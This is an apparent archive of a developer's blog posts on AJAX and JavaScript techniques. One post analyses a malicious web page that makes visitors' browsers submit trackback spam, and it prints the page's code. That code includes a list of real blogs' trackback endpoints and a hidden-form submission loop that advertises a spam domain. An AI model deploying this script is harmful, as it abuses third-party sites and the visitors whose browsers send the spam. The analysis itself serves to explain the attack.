New AJAX Search for PublicDomainReprints.org

March 30, 2008 – 11:05 pm

Over the weekend I coded up a new BETA search function for PublicDomainReprints.org which uses Google’s AJAX Search API. This new search (which can be found here) lets people search for more public domain books and request reprints without leaving the site. The original search is still available on the same page (it works by redirecting people to the original archive).

In the works: hard cover support, archival quality reprints, splitting of large volumes, and more!

Spreading Comment and Trackback Spam Through Zombie Browsers

August 7, 2007 – 11:57 am

Since my move to WordPress, I have been noticing a lot of funny trackback hits going to my old Movable Type installation. First, all of these hits were coming from different IP addresses and different browsers. Second, they all had the same referrer. Something was fishy. On further examination, I found something really interesting.

It seems that the referrer is hosting a malicious HTML page. That page consists of a set of JavaScript snippets which load new frames and submit trackback pings to other blogs on the Internet. That means that anyone going to that malicious page is automatically submitting trackback spam somewhere else on the Net. When blog owners see the spam, they go back to check out the referrer and end up on the malicious page, which then submits more trackback spam in the background. The trackbacks themselves lead to fake blogs and search results, which eventually lead to either drug stores or ad-populated pages.

There are several interesting things here. First - the malicious page kind of propagates itself. Second, the page does not use any kind of security exploit - everything is done through regular JavaScript. Third, there is apparently enough interest in referrers that it generates enough traffic to affect other sites. All of this is very similar to the way regular spam and viruses are spread - through zombie computers, except in this case the browsers are the zombies.

Below are some snippets from the code of this site (you can view the decoded site source here - courtesy of Stephane “Gooby” Theroux’s decoder):

First the site loads an array with the target track back URLs:

var ss = new Array('http://140.99.61.57/cgi-bin/mt/mt-tb.cgi/211', 'http://64.130.58.178/cgi-sys/cgiwrap/ebradio/managed-mt/mt-tb.cgi/55', 'http://www.creativedestruction.com/MT/mt-tb.cgi/25', 'http://www.thirstytheologian.com/mt/mt-tb.cgi/287', 'http://www.ultrasparky.org/mt/mt-tb.cgi/5406', 'http://blog.avramovic.info/bblog/trackback.php/9/', 'http://www.technologyevangelist.com/cgi-bin/mt-tb.fcgi/685', 'http://www.edspresso.com/cgi-bin/mt/mt-t.cgi/1002', 'http://hellyes.nl/iam/wp-trackback.php?p=3', 'http://varnam.org/mt33/mt-tb.cgi/157', 'http://varnam.org/mt33/mt-tb.cgi/157');

The next step is to create the frames and forms inside:


var d = parent.fr1.document;
d.write('<div id=mainpage style="display:none">');
d.write('<div id=tbdescr align=center></div>');
d.write('<form name=fff method=POST target=fr2>');
d.write('<input type=text name=url>');
d.write('<input type=text name=title>');
d.write('<input type=text name=excerpt>');
d.write('<input type=text name=blogname>');
d.write('</form>');
d.write('</div>');
tbsp();

Third step is to load up the forms and submit:


function tbsp()
{
var d = parent.fr1.document;
d.getElementById('tbdescr').innerHTML = ii + ': ' + unescape(ss[ii]);
d.fff.action = unescape(ss[ii]);
d.fff.url.value = unescape('http://getdayfile.nicespace.ca');
d.fff.title.value = unescape('Diphtheria');
d.fff.excerpt.value = 'Read more about ' + unescape('Diphtheria');
d.fff.blogname.value = unescape('Diphtheria');
d.fff.submit();
...

Fourth step - rinse, repeat:


if (ii > 0) {
ii--;
setTimeout('tbsp()', 10000);
} else {
setTimeout('refresh()', 2000);
}

This can happen because the browser does not restrict a page's scripts from interacting with the child frames that the page itself creates. Thus, dynamically created frames can submit malicious forms without any user interaction. It is not out of the realm of possibility for this type of attack to be extended to any sort of Web service or web application that accepts GET or POST requests. In fact, it would probably be trivial, although most social networks and web applications should be filtering out JavaScript.
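To make concrete what each hidden form submission sends, here is a minimal sketch of the request body a browser would produce for the form shown above. The helper name `encodeTrackbackForm` and the `spam.example` URL are my own placeholders and do not appear in the malicious page; the field names are the ones the page writes into its form.

```javascript
// Sketch only: reproduces the form-encoded body a browser would send when the
// hidden form is submitted. encodeTrackbackForm is a hypothetical helper name.
function encodeTrackbackForm(fields) {
  const params = new URLSearchParams();
  for (const [name, value] of Object.entries(fields)) {
    params.append(name, value);
  }
  return params.toString();
}

// Field names match the inputs the page creates; the URL is a placeholder.
const body = encodeTrackbackForm({
  url: 'http://spam.example/',
  title: 'Diphtheria',
  excerpt: 'Read more about Diphtheria',
  blogname: 'Diphtheria'
});
console.log(body);
```

Nothing in the body itself distinguishes it from a ping sent on purpose, which is part of what makes this kind of spam hard to filter by content alone.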

At the current time there is no protection against this type of attack other than disabling Javascript or having the browser warn you before submitting a form.

Comments are welcome at blog /at/ shaftek [dot] org.

An Ajax Search Engine Without Servers (Almost)

July 10, 2007 – 10:40 pm

For a while I have been working on a hobby project trying to make a meta-search engine that you can use to search multiple search engines by tag. The catch? No server side components. This search engine works client side only from the user’s browser by using RSS feeds from search engines and Google’s AJAX Feed API to access them from the client browser.

The engine is called “ShafTag” and can be found at www.shaftag.com.

Comments are welcome at code /at/ shaftek [dot] org.

Reverse Resolution of IP Addresses with AJAX

June 21, 2006 – 1:40 pm

One of the things that came up recently at work is a way to resolve IP addresses to hostnames client-side without any server calls. Here are some of the possibilities that I thought of:

o Using Javascript to call Java’s java.net.InetAddress class to resolve (only works in Mozilla and Opera, needs security permissions)
o Using a Java Applet calling the same class and accessing it via JavaScript / LiveConnect (works in IE also, needs a signed applet)
o Using XUL (Mozilla only, only hostname to IP)
o Trying to call Flash via this bridge (needs a flash movie)

So the bottom line is that it is not possible without a server side process or a signed applet.
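For reference, the lookup that a server-side process or signed applet ends up performing is a DNS PTR query against a name derived from the address. That name can be computed client side; only the query itself cannot. A minimal sketch for IPv4 addresses (the function name `toPtrName` is mine, and the address used is from a documentation range):

```javascript
// Sketch only: build the reverse-lookup (PTR) name for an IPv4 address.
// This does not perform any DNS query; it only formats the name to query.
function toPtrName(ip) {
  const octets = String(ip).split('.');
  const valid = octets.length === 4 &&
    octets.every(o => /^\d{1,3}$/.test(o) && Number(o) <= 255);
  if (!valid) {
    throw new RangeError('not a dotted-quad IPv4 address: ' + ip);
  }
  // Octets are reversed and placed under the in-addr.arpa zone.
  return octets.reverse().join('.') + '.in-addr.arpa';
}

console.log(toPtrName('192.0.2.10'));
```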

Saving and Loading Files from Web Pages via AJAX

February 16, 2006 – 2:32 pm

I recently ran across a nifty project called “TiddlyWiki”. One of the features that struck me as interesting from the programming point of view is that it is able to load and save itself to the user’s hard drive using JavaScript without any kind of server side support. After digging more into the source code (which is licensed under a BSD license), it seems pretty straightforward and simple and I am going to describe it in this post. WARNING: all this code is based on the TiddlyWiki code covered under a BSD license (for full license terms, see their website).

The trick to saving and opening data in JavaScript is not using JavaScript :) Rather, this particular hack relies on browser-specific functionality, but it just so happens that IE, Mozilla AND Opera all expose this functionality in three different ways. Here is how to save files in IE relying on the Scripting.FileSystemObject functionality:

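// IE only: Scripting.FileSystemObject is exposed through ActiveX
var fso = new ActiveXObject("Scripting.FileSystemObject");
// 2 = open for writing, -1 = create the file if missing, 0 = ASCII format
var file = fso.OpenTextFile(filePath,2,-1,0);
file.Write(content);
file.Close();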

In Mozilla, the trick is to use two XPCOM components called “mozilla.org/file/local” and “mozilla.org/network/file-output-stream”:

// Ask the user for permission to use XPConnect from page script
netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");
var file = Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
file.initWithPath(filePath);
// Create a normal file (type 0) with permissions 0664 if it is not there yet
if (!file.exists())
file.create(0, 0664);
var out = Components.classes["@mozilla.org/network/file-output-stream;1"].createInstance(Components.interfaces.nsIFileOutputStream);
// 0x20 | 0x02 = truncate | write-only
out.init(file, 0x20 | 0x02, 00004,null);
out.write(content, content.length);
out.flush();
out.close();

In Opera, this is done by interfacing to the Java Core API via Javascript:

var s = new java.io.PrintStream(new java.io.FileOutputStream(operaUrlToFilename(filePath)));
s.print(content);
s.close();
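The three snippets above need something to choose between them at run time. Here is a minimal sketch of that choice by feature detection. The function name `pickSaveStrategy` and the returned labels are my own, and TiddlyWiki's actual detection logic may well differ; `env` stands in for the browser's global object so the logic can be read outside a browser.

```javascript
// Sketch only: decide which of the three save mechanisms is available.
// `env` is normally `window`; it is a parameter here purely for illustration.
function pickSaveStrategy(env) {
  // IE exposes ActiveXObject, which gives access to Scripting.FileSystemObject.
  if (typeof env.ActiveXObject !== 'undefined') {
    return 'ie';
  }
  // Mozilla exposes the privilege manager and the Components object.
  // Checked before Java because a Mozilla browser may expose `java` as well.
  if (env.netscape && env.Components) {
    return 'mozilla';
  }
  // Opera path: the Java core API reachable from script.
  if (env.java && env.java.io) {
    return 'opera';
  }
  return null; // no known way to save from this browser
}
```

In a page this would be called as `pickSaveStrategy(window)`, with the result used to select one of the code paths shown above.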

DESKTOP APPS BUILT LIKE THE WEB

One of the upcoming big technologies in Microsoft’s new OS (“Windows Vista”) is XAML - an XML language for defining user interfaces. Mozilla also has a similar one called XUL. All of these are trying to accomplish the same thing - make rich applications run on the desktop while letting developers write them like web applications. Microsoft in particular is being driven by the biggest threat to their proprietary Windows OS “cash cow” they have ever seen - the Web. As Joel Spolsky puts it: “… suddenly, Microsoft’s API doesn’t matter so much. Web applications don’t require Windows”. Mozilla was motivated by a need to easily write cross-platform code (ironically the exact opposite of what drives Microsoft). But the end result was still pretty much the same - full-featured desktop apps written in markup instead of compiled code.

WEB APPS THAT RUN LIKE DESKTOP APPS

While this has been happening, a second major technology has been brewing for a while - Ajax. Using JavaScript and XML instead of proprietary technologies like Flash and browser-specific extensions like ActiveX, this new approach to web development allowed for innovative applications running on the web that in many cases looked and felt like desktop applications. Led by well known sites like Gmail and Google Maps, it took the Internet by storm. The prime drive was to make web applications run and feel like desktop applications while still running on the Web and being developed like regular web sites with markup and open standards such as XHTML, CSS and JavaScript. And the standards involved are still being improved by the likes of W3C and WHATWG to make these work better and faster.

A third major development has just recently begun as well - widgets. Microsoft’s Live.com, Google’s homepage service as well as lots of other “Ajax Homepages” have been popping up as of late. All of these offer a web desktop extensible enough so custom widgets can be added to them. The actual widgets are Ajax pieces - basically HTML with CSS and JavaScript running in very small windows and under certain constraints (see Microsoft’s gadget list and Google’s for some examples).

WEB APPS ON DESKTOP

While widgets may be seen as mere toys and Ajax as a raw technology, they are harbingers of something much more important yet to come - web applications that live on the desktop and the Web, and easily cross the path between both. Some first attempts at this have begun, such as Microsoft’s plans to allow widgets to cross from Live.com to the desktop, Yahoo’s widgets that live on the desktop and Google’s sidebar plugins that can be written in JavaScript.

However, there is a next step. Overlooked by the giants of computer technology, the blogs and other media, is one small project built by Jeremy Ruston - TiddlyWiki (a variant called GTD Tiddly Wiki is better known in some circles). In essence it is just a wiki like any other, but a closer look under the hood reveals otherwise. It is a self-contained web application that can run from the web OR the desktop, and save itself from the desktop to the web and vice-versa. All built with regular DHTML, CSS and JavaScript in a 120KB package of open standard goodness. It is the first example of what is probably going to be a flood of new desktop/web programs that run anywhere, communicate with anyone and are built using open standards without licensing fees.

THE GOLDEN GRAIL: WEB AND DESKTOP SEAMLESS

TiddlyWiki is not much to many of us but it foretells the golden grail of desktop/web integration - Sun’s old slogan: “The Network is the Computer”. In such a future we should be able to log in to any website in the world, have the site run locally on our computer as an application and then save itself back to the web. The integration should be seamless and transparent and run on any platform. Or even better, perhaps it can also talk to other web applications out there. So for example, when I wake up in the morning to check my calendar, my web/desktop super-dooper scheduling application can tell me if an appointment needs to be rescheduled because someone else is unable to make it, after being notified by his scheduling app. I should also be able to save my desktop back to the web and access it from anywhere. With web services and open standards this is not far-fetched.

That would also mean something else - XUL and XAML as well as other proprietary ways of accomplishing this goal will fall by the wayside. In their place we will have XHTML, CSS and JavaScript - all of which are open standards and will run on every platform. Instead of conventional software that is downloaded and installed, we just might end up only using a browser with everything else, desktop and web, running inside of it.

BookChaser: an Ajax Book Search Engine

May 26, 2005 – 1:19 am

A very long time ago (about five years) I had the bright idea of starting a new search engine like IMDB but for books. Eventually I purchased the BookChaser.com domain name and have held on to it ever since. At some point a bunch of people like me got together and formed the Internet Book Database Project. Unfortunately, waning interest and time constraints eventually disbanded our little group and nothing ever came of it.

Looking at the same idea after five years I suddenly see new hope. Two of the main problems all along have been (1) getting all the book data and (2) getting enough money to run servers to store that data. Now looking at what’s out there, including AJAX and web services for sites like Amazon, I suddenly see those problems solved. So here is a short summary of what I think BookChaser should look like (but unfortunately I haven’t got the time to code it):

1. Full-AJAX application in HTML requiring no other servers.
2. Primary search is done against Amazon’s database via AWS and XmlHttpRequest with results displayed directly in the browser (I have done something similar for UPS’s XML API with AJAX).
3. Search against other book stores to retrieve prices just like Book Burro does in Firefox.
4. Gets information from libraries based on LibraryLookup from Jon Udell.
5. Maybe even add Z39.50 support via some toolkit that calls Z39.50 gateways directly.
6. Add support for reviews via AllConsuming, IBList, and others.

The only downsides that I see with this approach are that all of this would run very slowly in a browser and put a large load on all of the services involved. A better approach might be to provide some generic server-side web services caching for these in some instances (but that would kill all of the fun).
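To illustrate the caching idea, here is a minimal sketch of a time-limited cache wrapped around a lookup function. It is in-memory only and says nothing about how a real caching service would be deployed; `makeCachedLookup`, `findPrice` and the fake lookup are all hypothetical names made up for this example.

```javascript
// Sketch only: wrap a lookup function with a time-limited in-memory cache.
// `lookup` is a placeholder for whatever call actually hits a book service;
// `now` is injectable so expiry can be exercised without waiting.
function makeCachedLookup(lookup, ttlMs, now = Date.now) {
  const cache = new Map(); // key -> { value, expires }
  return function cachedLookup(key) {
    const hit = cache.get(key);
    if (hit && hit.expires > now()) {
      return hit.value; // still fresh, no call to the service
    }
    const value = lookup(key);
    cache.set(key, { value: value, expires: now() + ttlMs });
    return value;
  };
}

// Usage: the second call for the same key is served from the cache.
let calls = 0;
const findPrice = makeCachedLookup(function (isbn) {
  calls++;
  return 'price for ' + isbn; // stand-in for a real service response
}, 60000);
findPrice('0131103628');
findPrice('0131103628');
console.log(calls);
```

The point of the wrapper is only that repeated searches for the same book stop generating load on the services involved.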

UPDATE: I took some time and coded up a prototype. BookChaser v0.1 is available here and here. Leave comments on this post OR send email to code \at\ shaftek {dot} org.

A Standalone Web Application

May 13, 2005 – 12:08 pm

This may sound kind of strange but I recently ran across a new web application that is not meant to be used over the web. Confused yet? Well, this application is an HTML file with lots of complicated DOM/DHTML/CSS stuff that is meant to be used and saved on your regular computer. Reminds me of what Microsoft is planning for Longhorn with XAML.

Tracking UPS Packages via JavaScript

January 3, 2005 – 1:51 pm

A recent post at TechDigits about tracking UPS packages via RSS and web services got me thinking if the same is possible via Javascript and the XmlHttpRequest object (in IE and Mozilla). Since Google’s Gmail and Google Suggest started using that object, it has become more popular. So after some thinking, I put together the following quick and dirty code snippet:

req = new XMLHttpRequest();

var strXML = '<?xml version=\'1.0\'?>' +
'<AccessRequest xml:lang=\'en-US\'>' +
'<AccessLicenseNumber>YOURLICENSEKEY</AccessLicenseNumber>' +
'<UserId>YOURUSERNAME</UserId>' +
'<Password>YOURPASSWORD</Password>' +
'</AccessRequest>' +
'' +
'<?xml version=\'1.0\'?>' +
'<TrackRequest xml:lang=\'en-US\'>' +
'<Request>' +
'<TransactionReference>' +
'<CustomerContext>sample</CustomerContext>' +
'<XpciVersion>1.0001</XpciVersion>' +
'</TransactionReference>' +
'<RequestAction>Track</RequestAction>' +
'<RequestOption>activity</RequestOption>' +
'</Request>' +
'<TrackingNumber>1Z12345E1512345676</TrackingNumber>' +
'</TrackRequest>';
req.open('POST', 'https://www.ups.com/ups.app/xml/Track', false);
req.send(strXML);
document.write(req.responseText);

This code on Mozilla browsers will retrieve and print the raw XML response (you do need your UPS credentials to make it work, which is a bit of a security flaw since they sit in the page source). Once you have the response, you can process it via Mozilla’s or IE’s XSLT processors, or via regular DOM methods after parsing it into a DOM tree as follows:

var parser = new DOMParser();
var doc = parser.parseFromString(req.responseText, "text/xml");

For Mozilla browsers, you also need to request a security permission from the user in order to access UPS’s website. A web proxy might be an answer to that problem but in any case here is the code:

netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");

I don’t know how useful this can be since the security information is exposed, but it is a nice hack.
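The hand-concatenated request earlier in this post can also be assembled by a small helper that escapes the values it inserts. This is only a sketch: `escapeXml` and `buildTrackRequest` are names I made up, the element names are copied from the snippet above, and nothing here has been checked against UPS's own documentation.

```javascript
// Sketch only: assemble the two-document request body used in this post.
// escapeXml and buildTrackRequest are hypothetical helper names.
function escapeXml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

function buildTrackRequest(creds, trackingNumber) {
  return "<?xml version='1.0'?>" +
    "<AccessRequest xml:lang='en-US'>" +
    '<AccessLicenseNumber>' + escapeXml(creds.licenseKey) + '</AccessLicenseNumber>' +
    '<UserId>' + escapeXml(creds.userId) + '</UserId>' +
    '<Password>' + escapeXml(creds.password) + '</Password>' +
    '</AccessRequest>' +
    "<?xml version='1.0'?>" +
    "<TrackRequest xml:lang='en-US'>" +
    '<Request>' +
    '<TransactionReference>' +
    '<CustomerContext>sample</CustomerContext>' +
    '<XpciVersion>1.0001</XpciVersion>' +
    '</TransactionReference>' +
    '<RequestAction>Track</RequestAction>' +
    '<RequestOption>activity</RequestOption>' +
    '</Request>' +
    '<TrackingNumber>' + escapeXml(trackingNumber) + '</TrackingNumber>' +
    '</TrackRequest>';
}

// Placeholder credentials, same as in the original snippet.
var strXML = buildTrackRequest(
  { licenseKey: 'YOURLICENSEKEY', userId: 'YOURUSERNAME', password: 'YOURPASSWORD' },
  '1Z12345E1512345676'
);
```

The escaping matters mostly for the password field, where characters like `&` or `<` would otherwise produce a malformed document.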

Hiding Table Rows in DHTML

October 24, 2004 – 12:13 am

One of the more fun things in DHTML is dynamic manipulation of page content. An interesting question that recently came up at work was hiding and displaying a single table row. The solution I came up with is pretty simple - set the CSS display property in the STYLE attribute of the table row to “display: none” to hide it and then set it to “display: table-row” to unhide it. The problem is that it won’t work in Internet Explorer, primarily due to the fact that the display property can be set to “table-row” only in CSS 2, not in CSS 1 where only “inline” or “block” is possible. Internet Explorer only supports CSS 1 at this time.

So the logical solution would be to use “block” for table rows in IE, as recommended by Microsoft. Unfortunately, this will cause problems with non-Microsoft browsers if any cell inside such a row uses COLSPAN. The solution is to set the display property to the display property of some other, visible table row, like this in JavaScript:

hidden_row.style.display = visible_row.style.display;

You can try it out below, on IE ‘table-row’ will throw an error but everything else will work fine. On other browsers, the ‘block’ approach will not work:

Col 1 Col 2 Col 3
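Wrapped into a pair of helpers, the trick looks roughly like the sketch below. The function names are mine; the rows are passed in as arguments, so in a page they would come from something like `document.getElementById` with whatever IDs your table uses.

```javascript
// Sketch only: hide a table row, and show it again by copying the display
// value of a row that is already visible. Function names are hypothetical.
function hideRow(row) {
  row.style.display = 'none';
}

function showRow(row, visibleRow) {
  // A visible row with no inline display value reports an empty string here;
  // assigning that clears the inline 'none' and lets the browser fall back
  // to its own default for table rows, whatever that is in this browser.
  row.style.display = visibleRow.style.display;
}
```

Because the value is borrowed from the browser rather than hard-coded, the same code avoids both the 'table-row' error in IE and the 'block' layout problem elsewhere.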

Changing Web Page Content on the Fly

October 12, 2004 – 6:31 pm

An interesting problem that comes up often is the need to change a part of a web page without reloading the entire page. This is especially true when dynamic content like a list needs to be generated from a database and included in the page. The solution to this is to do a dynamic JavaScript include - programmatically include a JavaScript file that can be generated dynamically, let’s say by a servlet. The usual way to do that is via “document.write()” to write a “SCRIPT” tag into the web page. A cleaner way, using the DOM, is discussed in an article written by Moshe Moskowitz:

var scriptElement = document.createElement("script");
scriptElement.src = url;
scriptElement.type="text/javascript";
getObject('someSection').appendChild(scriptElement);

Now, what happens if your dynamic content generator also gives error pages in plain HTML? The code above will not work if an error occurs since the input provided will be HTML, not Javascript. So a workaround for this is to make the error pages do both JavaScript and HTML by adding the JavaScript code to the beginning of the HTML page and commenting it out with HTML comment tags. Then you can use JavaScript comment tags to comment out the HTML file itself. The result will execute JavaScript if included dynamically in a SCRIPT tag, and will show proper HTML (and even validate) if thrown in regular HTML processing. Here is a complete example with JavaScript content in red and HTML content in blue:

<!--
alert("ERROR: Can't find webpage [404]!");
/*
-->
<HTML>
<BODY>
<H1>ERROR: Can’t find webpage [404]!</H1>
</BODY>
</HTML>
<!--
*/ // -->

The JavaScript code is enclosed in an HTML comment, making it invisible to a browser that renders the page as HTML. However, when the page is loaded through a SCRIPT tag, the JavaScript engine ignores the opening HTML comment tag and executes the code until it reaches the JavaScript comment opener “/*”, which hides the HTML that follows. The closing “*/” at the bottom and the follow-up “//” make sure that the JavaScript engine ignores the rest of the HTML content. At the same time, the two sets of HTML comment tags at the top and bottom make sure that a browser rendering the page as HTML ignores all of the JavaScript code and the JavaScript comment markers.
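If the error pages are generated by code, the same layout can be produced from a single message string. The following is a minimal sketch, written in JavaScript only to stay in one language (a servlet would do the same thing in Java); `escapeHtml` and `makePolyglotErrorPage` are names I made up for it.

```javascript
// Sketch only: generate an error page that is valid both as HTML and as a
// script include, following the layout described above.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

function makePolyglotErrorPage(message) {
  // Assumption: the message must not contain "--" or "*/", since either one
  // would end an HTML comment or the JavaScript block comment too early.
  if (message.indexOf('--') !== -1 || message.indexOf('*/') !== -1) {
    throw new Error('message would break the comment structure');
  }
  return [
    '<!--',
    'alert(' + JSON.stringify(message) + ');', // quoted safely as a JS string
    '/*',
    '-->',
    '<HTML>',
    '<BODY>',
    '<H1>' + escapeHtml(message) + '</H1>',
    '</BODY>',
    '</HTML>',
    '<!--',
    '*/ // -->'
  ].join('\n');
}

var page = makePolyglotErrorPage("ERROR: Can't find webpage [404]!");
```

Using `JSON.stringify` for the alert text sidesteps the problem of apostrophes in the message ending the string early.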